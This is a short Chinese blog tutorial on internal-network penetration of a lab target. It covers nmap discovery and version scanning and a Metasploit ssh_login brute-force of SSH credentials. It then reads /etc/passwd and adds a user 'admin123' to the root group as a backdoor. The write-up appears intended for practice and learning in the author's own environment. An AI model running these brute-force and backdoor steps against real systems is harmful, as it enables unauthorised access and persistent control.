内网渗透之扫描与SSH暴力破解

扫描局域网存活主机

注意:以下使用的ip地址为我部署的环境网段,如果你在看本文,请灵活的进行学习以及使用。目标主机=靶机

nmap -sP 192.168.1.0/24
内网渗透之扫描与SSH暴力破解_第1张图片

扫描靶机的操作系统以及版本号

nmap -O 192.168.1.111
内网渗透之扫描与SSH暴力破解_第2张图片

扫描靶机的应用程序以及应用程序的版本号

nmap -sV 192.168.1.111
内网渗透之扫描与SSH暴力破解_第3张图片

利用msf ssh_login模块暴力破解靶机ssh密码

先打开MSF 进入ssh_login模块 show options查看提示

使用ssh_login模块

use auxiliary/scanner/ssh/ssh_login
内网渗透之扫描与SSH暴力破解_第4张图片

设定靶机IP

set RHOSTS 192.168.1.111

设置账号文件/设置账号

你可以设置账号,但是只尝试这一个,建议你使用账号文件

#设置账号
set USERNAME root
#设置账号文件
set USER_FILE 密码文件

设置密码文件/设置密码

你可以设置密码,但是只尝试这一个,建议你使用密码文件

#设置密码
set PASSWORD 123456
#设置密码文件
set PASS_FILE 密码文件

运行

你既可以使用run也可以使用exploit

内网渗透之扫描与SSH暴力破解_第5张图片

会话

查询会话方面的信息

sessions -i
内网渗透之扫描与SSH暴力破解_第6张图片

打开会话

#打开id为1的会话 输入ifconfig查询ip 成功
sessions -i 1
内网渗透之扫描与SSH暴力破解_第7张图片

查看密码文件

cat /etc/passwd
内网渗透之扫描与SSH暴力破解_第8张图片

添加用户设置密码并添加到root组

useradd admin123
passwd admin123
usermod -g root admin123
内网渗透之扫描与SSH暴力破解_第9张图片

逍遥's Blog

你可能感兴趣的:(内网渗透之扫描与SSH暴力破解)